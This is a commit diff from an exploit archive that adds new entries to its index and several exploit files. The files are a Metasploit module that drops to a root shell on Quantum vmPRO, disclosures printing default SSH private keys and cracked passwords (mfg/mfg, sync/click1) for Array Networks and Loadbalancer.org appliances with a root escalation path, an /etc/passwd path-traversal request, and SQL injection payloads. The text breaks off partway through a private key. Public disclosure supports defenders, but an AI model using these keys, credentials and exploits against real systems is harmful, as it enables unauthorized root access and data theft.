Updated 03_21_2014

files.csv

@@ -13612,7 +13612,7 @@ id,file,description,date,author,platform,type,port
 15699,platforms/php/webapps/15699.txt,"PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification",2010-12-06,"emgent white_sheep and scox",php,webapps,80
 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0
 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0
-15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
+15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
 15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0
 15706,platforms/windows/local/15706.txt,"Winamp 5.6 Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0
 15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 Buffer Overflow Vulnerability",2010-12-08,"Luigi Auriemma",multiple,dos,0
@@ -29055,7 +29055,7 @@ id,file,description,date,author,platform,type,port
 32279,platforms/php/webapps/32279.txt,"Vanilla 1.1.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-08-19,"James Bercegay",php,webapps,0
 32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script 'id' Parameter SQL Injection Vulnerability",2008-08-20,"Hussin X",php,webapps,0
 32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure Vulnerability",2008-06-19,"Charalambous Glafkos",php,webapps,0
-32282,platforms/php/webapps/32282.txt,"Church Edit Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0
+32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0
 32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 'pid' Parameter SQL Injection Vulnerability",2008-08-21,"Hussin X",php,webapps,0
 32284,platforms/php/webapps/32284.txt,"Simasy CMS 'id' Parameter SQL Injection Vulnerability",2008-08-21,r45c4l,php,webapps,0
 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 '$newpm[title]' Parameter Cross-Site Scripting Vulnerability",2008-08-20,"Core Security",php,webapps,0
@@ -29130,8 +29130,17 @@ id,file,description,date,author,platform,type,port
 32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP 'news.php' SQL Injection Vulnerability",2008-09-10,r45c4l,php,webapps,0
 32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 AntiVirus Directory Path Buffer Overflow Vulnerability",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0
 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - SEH Buffer Overflow Exploit",2014-03-19,"Ayman Sagy",windows,local,0
+32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection Vulnerabilty",2014-03-19,jsass,php,remote,0
 32360,platforms/php/webapps/32360.txt,"NooMS 1.1 smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0
 32361,platforms/php/webapps/32361.txt,"NooMS 1.1 search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0
+32362,platforms/multiple/remote/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service Vulnerability",2008-09-12,"Luigi Auriemma",multiple,remote,0
+32363,platforms/multiple/remote/32363.txt,"Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities",2008-09-11,"Luigi Auriemma",multiple,remote,0
 32364,platforms/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 'index.php' Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0
 32365,platforms/php/webapps/32365.txt,"Paranews 3.4 Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0
 32366,platforms/php/webapps/32366.txt,"QuicO 'photo.php' SQL Injection Vulnerability",2008-09-12,"Beenu Arora",php,webapps,0
+32367,platforms/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command",2014-03-19,metasploit,unix,remote,22
+32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80
+32369,platforms/hardware/webapps/32369.txt,"Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities",2014-03-19,xistence,hardware,webapps,0
+32370,platforms/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Privilege Escalation",2014-03-19,xistence,hardware,local,0
+32371,platforms/unix/remote/32371.txt,"Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key",2014-03-19,xistence,unix,remote,0
+32372,platforms/unix/remote/32372.txt,"Quantum DXi V1000 2.2.1 - Static SSH Key",2014-03-19,xistence,unix,remote,22

platforms/hardware/local/32370.txt

@@ -0,0 +1,85 @@
+-----------
+Author:
+-----------
+
+xistence < xistence[at]0x90[.]nl >
+
+-------------------------
+Affected products:
+-------------------------
+
+Quantum vmPRO 3.1.2 and below
+
+-------------------------
+Affected vendors:
+-------------------------
+
+Quantum
+http://quantum.com/
+
+-------------------------
+Product description:
+-------------------------
+
+Unlike traditional backup applications and other backup applications
+designed for virtual environments,
+Quantum vmPRO Software backs up VMs in native VMware format. This enables
+users to restore or boot VMs
+in seconds without the use of a backup application, reduces virtual server
+and network usage by reducing
+VM image sizes before backing up those images to backup storage, and
+substantially reduces the cost of
+using traditional backup applications to back up virtual environments.
+
+----------
+Details:
+----------
+
+[ 0x01 - Shell Backdoor Command ]
+
+The file "/usr/local/pancetera/bin/cmd_processor.py" on the vmPRO 3.1.2
+virtual machine contains the following lines:
+
+    def cmd_shell_escape(self, args):
+        log_panshell(syslog.LOG_INFO, "internal consistency check started")
+        env = dict(os.environ)
+        env['SHELL'] = '/bin/bash'
+        env['HOME']  = '/tmp'
+        env['TERM']  = 'xterm'
+        os.spawnle(os.P_WAIT, '/bin/bash', 'bash', env)
+        log_panshell(syslog.LOG_INFO, "internal consistency check finished")
+        return
+
+This is a hidden command to gain a root shell. If we create a user in the
+web interface without administrator rights,
+we can still ssh and gain a root shell! This of course should not be
+possible and only be accessible to an admin user.
+
+$ ssh non-admin@192.168.2.112
+non-admin@192.168.2.112's password:
+Last login: Thu Dec 19 23:42:10 2013 from 192.168.2.72
+Welcome to Quantum vmPRO Console
+--------------------------------
+
+Quantum vmPRO GUI: https://192.168.2.112/
+
+*** Type 'help' for a list of commands.
+
+quantum:localhost> shell-escape
+bash-4.1# id
+uid=0(root) gid=100(users) groups=0(root),100(users)
+
+
+-----------
+Solution:
+-----------
+
+Upgrade to version 2.3.0.1 or newer
+
+--------------
+Timeline:
+--------------
+
+03-01-2014 - Issues discovered and vendor notified
+15-01-2014 - No reply, asked for status update.
+17-03-2014 - No replies, public disclosure

platforms/hardware/webapps/32369.txt

@@ -0,0 +1,224 @@
+-----------
+Author:
+-----------
+
+xistence < xistence[at]0x90[.]nl >
+
+-------------------------
+Affected products:
+-------------------------
+
+Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances
+
+-------------------------
+Affected vendors:
+-------------------------
+
+Array Networks
+http://www.arraynetworks.com/
+
+-------------------------
+Product description:
+-------------------------
+
+vAPV:
+Virtual Application Delivery Controllers for Cloud and Virtualized
+Environments
+Powered by Array's award-winning 64-bit SpeedCore(tm) architecture, vAPV
+virtual application delivery controllers extend Array's
+proven price-performance and rich feature set to public and private clouds
+and virtualized datacenter environments.
+vAPV virtual application delivery controllers give enterprises and service
+providers the agility to offer on-demand
+load balancing services, dynamically allocate resources to maximize ROI on
+application infrastructure and develop and size
+new application environments using either private or public clouds.
+
+
+vxAG:
+Secure Access Gateways for Enterprise, Cloud & Mobile Environments
+Secure access gatewaysSecure access is undergoing dramatic change. With
+increasing mobility, growing adoption of cloud
+services and a shift in thinking that favors securing data over securing
+networks and devices, modern enterprises require
+a new breed of secure access solutions. Secure access gateways centralize
+control over access to business critical resources,
+providing security for data in motion and at rest and enforcing application
+level policies on a per user basis.
+
+The Array AG Series secure access gateway addresses challenges faced by
+enterprise, service provider and pubic-sector
+organizations in the areas of secure remote and mobile access to
+applications and cloud services. Available in a range of
+scalable, purpose-built appliances or as a virtual appliance for cloud and
+virtualized environments, the AG Series can
+support multiple communities of interest, connect users both in the office
+and on-the-go and provide access to traditional
+enterprise applications as well as services running in public and private
+clouds.
+
+
+----------
+Details:
+----------
+
+[ 0x01 - Default Users/Passwords ]
+
+The /etc/master.passwd file on the vxAG 9.2.0.34 and vAPV 8.3.2.17
+appliances contain default (unkown to the admin) shell users and passwords.
+
+$ cat /etc/master.passwd
+# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
+#
+root:$1$9QkJT4Y5$lF2BPaSI2kPlcrqz89yZv0:0:0::0:0:Charlie &:/root:/bin/csh
+toor:*:0:0::0:0:Bourne-again Superuser:/root:
+daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
+operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
+bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
+tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
+kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
+games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
+news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
+man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
+sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
+smmsp:*:25:25::0:0:Sendmail Submission
+User:/var/spool/clientmqueue:/usr/sbin/nologin
+mailnull:*:26:26::0:0:Sendmail Default
+User:/var/spool/mqueue:/usr/sbin/nologin
+bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
+proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
+_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
+_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
+uucp:*:66:66::0:0:UUCP
+pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
+pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
+www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
+nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
+test:$1$UtEw8DNY$te4MRasnXgETxWOZ9Z1o10:1002:1002::0:0:test:/export/test:/bin/tcsh
+sync:$1$bmfGRJPh$lWnesbn8M8xZNo3uaqfEd1:1005:0::0:0:sync:/export/sync:/bin/sh
+recovery::65533:0::0:0:Recovery User:/:/ca/bin/recovery
+mfg:$1$i8SV4bKc$lNMeb8Yow.p.cZvWxt1mO1:1013:1010::0:0:mfg:/export/mfg:/bin/tcsh
+arraydb:*:1015:0::0:0:User &:/home/arraydb:/bin/sh
+array::1016:1011::0:0:User &:/:/ca/bin/ca_shell
+
+Doing a quick password crack, the passwords for the mfg and sync are
+revealed:
+
+User: mfg Password: mfg
+User: sync Password: click1
+
+The passwords for "test" and "root" couldn't be cracked in a short time.
+
+
+Below an example of logging in with the user "sync" and password "click1"
+via SSH.
+
+$ ssh sync@192.168.2.55 /bin/sh
+sync@192.168.2.55's password:
+id
+uid=1005(sync) gid=0(wheel) groups=0(wheel)
+
+
+[ 0x02 - SSH Private Key ]
+
+The "sync" user also contains a private key in "~/.ssh/id_dsa":
+
+$ cat id_dsa
+-----BEGIN DSA PRIVATE KEY-----
+MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
+q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
+xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
+Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
+gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
+mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
+O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
+OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
++0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
++sqSEhA35Le2kC4Y1/A=
+-----END DSA PRIVATE KEY-----
+
+The following authorized keys file are there in the ~/.ssh directory:
+
+$ cat authorized_keys
+1024 35
+117781646131320088945310945996213112717535690524599971400605193647439008360689916421327587459429042579662784434303538942896683338584760112042194838342054595473085094045804963620754645364924583113650482968246287214031112796524662479539236259838315876244144983122361617319660444993650437402628793785173700484401
+sync@AN
+
+$ cat authorized_keys2
+ssh-dss
+AAAAB3NzaC1kc3MAAACBAJTDsX+8olPZeyr58g9XE0L8PKT5030NZBPlE7np4hBqx36HoWarWq1Csn8M57dWN9StKbs03k2ggY6sYJK5AW2EWar70um3pYjKQHiZq7mITmitsozFN/K7wu2e2iKRgquUwH5SuYoOJ29n7uhaILXiKZP4/H/dDudqPRSY6tJPAAAAFQDtuWH90mDbU2L/Ms2lfl/cja/wHwAAAIAMBwSHZt2ysOHCFe1WLUvdwVDHUqk3QHTskuuAnMlwMtSvCaUxSatdHahsMZ9VCHjoQUx6j+TcgRLDbMlRLnwUlb6wpniehLBFk+qakGcREqks5NxYzFTJXwROzP72jPvVgQyOZHWq81gCild/ljL7hmrduCqYwxDIz4o7U92UKQAAAIBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQOC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBg==
+sync@AN
+
+This makes it possible to use the private key to login without a password.
+Do the following on a different system:
+
+Insert the id_dsa private key in a file called "synckey":
+
+cat > ~/synckey << EOF
+-----BEGIN DSA PRIVATE KEY-----
+MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
+q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
+xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
+Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
+gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
+mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
+O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
+OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
++0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
++sqSEhA35Le2kC4Y1/A=
+-----END DSA PRIVATE KEY-----
+EOF
+
+Change the rights of the file:
+
+chmod 600 ~/synckey
+
+SSH into the vxAG or vAPV appliance (change the IP below):
+
+ssh -i ~/synckey sync@192.168.2.55 /bin/sh
+
+Now you won't see a command prompt, but you can enter an "id" for example
+and you'll get:
+
+uid=1005(sync) gid=0(wheel) groups=0(wheel)
+
+
+[ 0x03 - Root Privilege Escalation ]
+
+The last issue is that the files "/ca/bin/monitor.sh" and
+"/ca/bin/debug_syn_stat" are world writable (chmod 777). Any user can write
+to these files.
+As the sync user it's possible to write to these files. If you write
+arbitrary commands to the monitor.sh script and then turn the debug
+monitoring off and on it will restart the script with root privileges.
+The sync user is able to run the /ca/bin/backend tool to execute CLI
+commands. Below how it's possible to turn the debug monitor off and on:
+
+Turn debug monitor off:
+/ca/bin/backend -c "debug monitor off"`echo -e "\0374"`
+
+Turn debug monitor on:
+/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`
+
+Thus through combining the SSH private key issue and the world writable
+file + unrestricted backend tool it's possible to gain a remote root shell.
+
+
+-----------
+Solution:
+-----------
+
+Upgrade to newer versions
+
+Workaround: Change passwords and SSH key. Do a chmod 700 on the world
+writable file.
+
+--------------
+Timeline:
+--------------
+
+03-02-2014 - Issues discovered and vendor notified
+08-02-2014 - Vendor replies "Thank you very much for bringing this to our
+attention."
+12-02-2014 - Asked vendor for status updates and next steps.
+17-03-2014 - No replies, public disclosure

platforms/jsp/webapps/32368.txt

@@ -0,0 +1,45 @@
+Cloud SSO is vuln to unauthed XSS in the authentication audit form:
+
+https://twitter.com/BrandonPrry/status/445969380656943104
+
+McAfee Asset Manager v6.6 multiple vulnerabilities
+
+http://www.mcafee.com/us/products/asset-manager.aspx
+
+Authenticated arbitrary file read
+An unprivileged authenticated user can download arbitrary files with the permissions of the web server using the report download functionality.
+By generating a report, the user's browser will make a request to /servlet/downloadReport?reportFileName=blah. The user can put in a relative directory traversal attack and download /etc/passwd.
+
+GET /servlet/downloadReport?reportFileName=../../../../../../../../etc/passwd&format=CSV HTTP/1.1
+Host: 172.31.16.167
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://172.31.16.167/Inventory?filterColumns=&curViewId=-1&maintainQuery=true&format=search&collectorId=null&criticality=0&pageNum=1&location=Inventory&viewSelect=-999999&filterValueField=&orderBy=FIREWALLED&orderBy2=SITE&orderBy3=CRITICALITY_NAME&wsz=200&wszCtrl_1=200&action=AUDIT_REDISCOVER&formatSelect=
+Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554
+Connection: keep-alive
+
+
+Authenticated SQL injection
+
+An unprivileged authenticated user can initiate a SQL injection attack by creating an audit report and controlling the username specified in the audit report. In the below request, the 'user' parameter is susceptible to the SQL injection:
+
+POST /jsp/reports/ReportsAudit.jsp HTTP/1.1
+Host: 172.31.16.167
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://172.31.16.167/jsp/reports/ReportsAudit.jsp
+Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 91
+
+fromDate=03-19-2014&toDate=03-19-2014&freetext=&Severity=0&AuditType=12&user=Administrator
+
+
+-- 
+http://volatile-minds.blogspot.com -- blog
+http://www.volatileminds.net -- website

platforms/multiple/remote/32362.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31140/info
+
+Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation.
+
+An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users.
+
+This issue affects Unreal Engine 3; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/32362.zip

platforms/multiple/remote/32363.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31141/info
+
+Unreal Engine is prone to multiple remote format-string vulnerabilities.
+
+Attackers can exploit the issues to execute arbitrary code within the context of a client application that uses the vulnerable engine. 
+
+http://www.exploit-db.com/sploits/32363.zip

platforms/php/remote/32359.txt

@@ -0,0 +1,44 @@
+####################################################################
+Exploit: SePortal 2.5 Sql Injection Vulnerabilty
+Author: jsass
+Date  : 19\03\2014
+Contact Twitter: @Kwsecurity
+Script: http://www.seportal.org/
+version: 2.5
+Tested on: Linux Ubuntu 12.4 & Windows 7
+Dork : "Powered by SePortal 2.5"
+
+//** Searching And  Analysis By Kuwaity Crew **\\
+
+####################################################################
+      SQL INJECTION Vulnerabilty
+
+       code :
+ $main_template = 'staticpages';
+
+define('GET_CACHES', 1);
+define('ROOT_PATH', './');
+define('GET_USER_ONLINE', 1);
+define('GET_STATS_BOX', 1);
+include(ROOT_PATH.'global.php');
+require(ROOT_PATH.'includes/sessions.php');
+
+  $sql = "SELECT *
+          FROM ".STATICPAGE_TABLE."
+          WHERE sp_id = '".$sp_id."'";
+  $result = $site_db->query($sql);
+
+      files:
+  staticpages.php?sp_id=(inject here)
+  print.php?mode=staticpage&client=printer&sp_id=(inject here)
+
+example:
+
+http://localhost/seportal2.5/staticpages.php?sp_id=1%27%20%20and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--%20-
+
+//////////////////////////////////////////////////////////////////////////////////
+     
+     
+               
+               
+ Greats: dzkabyle & Mr.Exit & massacreur & rDNix & hamza & Q8 Spy & ????? ?????? & medo medo & sec4ever.com & is-sec.com

platforms/unix/remote/32367.rb

@@ -0,0 +1,136 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Auxiliary::CommandShell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Quantum vmPRO Backdoor Command",
+      'Description'    => %q{
+        This module abuses a backdoor command in vmPRO 3.1.2. Any user, even without admin
+        privileges, can get access to the restricted SSH shell. By using the hidden backdoor
+        "shell-escape" command it's possible to drop to a real root bash shell.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'xistence <xistence[at]0x90.nl>'  # Original discovery and Metasploit module
+        ],
+      'References'     =>
+        [
+          ['URL', 'http://packetstormsecurity.com/files/125760/quantumvmpro-backdoor.txt']
+        ],
+      'DefaultOptions'  =>
+        {
+          'ExitFunction' => "none"
+        },
+      'Payload'        =>
+        {
+          'Compat' => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['Quantum vmPRO 3.1.2', {}],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Mar 17 2014",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RHOST(),
+        Opt::RPORT(22),
+        OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']),
+        OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin'])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+
+  def rhost
+    datastore['RHOST']
+  end
+
+
+  def rport
+    datastore['RPORT']
+  end
+
+
+  def do_login(user, pass)
+    opts = {
+      :auth_methods => ['password', 'keyboard-interactive'],
+      :msframework  => framework,
+      :msfmodule    => self,
+      :port         => rport,
+      :disable_agent => true,
+      :config => true,
+      :password => pass,
+      :record_auth_info => true,
+      :proxies => datastore['Proxies']
+    }
+
+    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, user, opts)
+      end
+    rescue Rex::ConnectionError, Rex::AddressInUse
+      return nil
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      return nil
+    rescue ::Timeout::Error
+      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      return nil
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      return nil
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      return nil
+    end
+
+    if ssh
+      conn = Net::SSH::CommandStream.new(ssh, 'shell-escape', true)
+      return conn
+    end
+
+    return nil
+  end
+
+
+  def exploit
+    user = datastore['USER']
+    pass = datastore['PASS']
+
+    print_status("#{rhost}:#{rport} - Attempt to login...")
+    conn = do_login(user, pass)
+    if conn
+      print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'")
+      handler(conn.lsock)
+    end
+  end
+end

platforms/unix/remote/32371.txt

@@ -0,0 +1,125 @@
+-----------
+Author:
+-----------
+
+xistence < xistence[at]0x90[.]nl >
+
+-------------------------
+Affected products:
+-------------------------
+
+Loadbalancer.org Enterprise VA 7.5.2 and below
+
+-------------------------
+Affected vendors:
+-------------------------
+
+Loadbalancer.org
+http://www.loadbalancer.org/
+
+-------------------------
+Product description:
+-------------------------
+
+The Loadbalancer.org Virtual Appliance is a revolution in software load
+balancing. The software is simple to install on Windows, Mac & Linux and
+does not have any adverse effects on the host operating system.
+
+----------
+Details:
+----------
+
+[ 0x01 - SSH Private Key ]
+
+Loadbalancer.org Enterprise VA 7.5.2 contains a default SSH private key:
+
+[root@lbmaster .ssh]# cat id_dsa
+-----BEGIN DSA PRIVATE KEY-----
+MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
+Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd
+yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ
+rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+
+t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW
+cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY
+TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1
+MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl
+2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH
+SzmJVCWFyVuuANR2Bnc=
+-----END DSA PRIVATE KEY-----
+
+And a authorized_keys2:
+
+[root@lbmaster .ssh]# cat authorized_keys2
+ssh-dss
+AAAAB3NzaC1kc3MAAACBAKwKBw7D4OA1H/uD4htdh04TBIHdbSjeXUSnWJsce8C0tvoB01Yarjv9TFj+tfeDYVWtUK1DA1JkyqSuoAtDANJzF4I6Isyd0KPrW3dHFTcg6Xlz8d3KEaHokY93NOmB/xWEkhme8b7Q0U2iZie2pgWbTLXV0FA+lhskTtPHW3+VAAAAFQDRyayUlVZKXEweF3bUe03zt9e8VQAAAIAEPK1k3Y6ErAbIl96dnUCnZjuWQ7xXy062pf63QuRWI6LYSscm3f1pEknWUNFr/erQ02pkfi2eP9uHl1TI1ql+UmJX3g3frfssLNZwWXAW0m8PbY3HZSs+f5hevM3ua32pnKDmbQ2WpvKNyycKHi81hSI14xMcdblJolhN5iY8/wAAAIAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkA==
+root@lbslave
+
+
+The manual says the following:
+
+---
+Appliance Security Lockdown Script
+
+To ensure that the appliance is secure it's recommended that a number of
+steps should be carried out.
+These steps have been incorporated into a lockdown script which can be run
+at the console (recommended) or via a terminal session.
+The script helps to lock down the following:
+- the password for the 'loadbalancer' Web User Interface account
+- the password for the Linux 'root' account
+- which subnet / host is permitted access to the load balancer
+
+It also regenerates the SSH keys that are used to secure communicating
+between the master and slave appliance.
+
+To start the script, at the console or via an SSH terminal session run the
+following command:
+???lbsecure
+---
+
+
+However, the lbsecure script will regenerate the id_dsa/id_dsa.pub, but the
+authorized_keys2 will remain untouched.
+This makes it still possible to login using the key, without any password!
+
+Create a file "lb" containing the key:
+
+$ cat lb
+-----BEGIN DSA PRIVATE KEY-----
+MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
+Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd
